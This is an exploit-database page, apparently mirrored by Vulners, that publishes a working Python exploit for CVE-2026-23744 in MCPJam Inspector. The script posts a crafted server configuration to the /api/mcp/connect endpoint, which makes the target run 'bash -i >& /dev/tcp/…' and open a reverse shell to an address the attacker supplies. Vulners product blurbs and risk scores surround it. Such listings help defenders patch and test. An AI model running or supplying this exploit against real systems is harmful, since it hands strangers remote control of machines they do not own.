Lucene search
K

MCPJam Inspector - Remote Code Execution

🗓️ 07 Jul 2026 00:00:00Reported by DiamorphineType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Exploit for CVE-2026-23744 enables remote code execution in MCPJam Inspector <=1.4.2.

Related
Code
# Exploit Title: MCPJam Inspector - Remote Code Execution 
# Date: 07/03/2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.mcpjam.com/
# Software Link: https://github.com/MCPJam
# Version: <=1.4.2
# Tested on: Debian
# CVE : CVE-2026-23744


import asyncio
import httpx
import argparse
from urllib.parse import urljoin


async def main(attacker_ip, attacker_port, url):
    async with httpx.AsyncClient(verify=False) as client:
        data = {
            "serverConfig": {
                "command": "bash",
                "args": ["-c", f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"],
                "env": {}
            },
            "serverId": "Hello666"
        }
        
        ready_url = urljoin(url, "/api/mcp/connect")
        r = await client.post(url=ready_url, json=data)
        print(r.text)

parser = argparse.ArgumentParser(description="Exploit for CVE-2026-23744 MCPJam Inspector - Remote Code Execution")

parser.add_argument("-u", "--url", required=True, help="Target host. e.g. http://127.0.0.1:8080")
parser.add_argument("-l", "--lhost", required=True, help="Attacker ip")
parser.add_argument("-p", "--lport", required=True, help="Attacker port")

args = parser.parse_args()

if __name__ == '__main__':
    asyncio.run(main(args.lhost, args.lport, args.url))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.43671
SSVC
34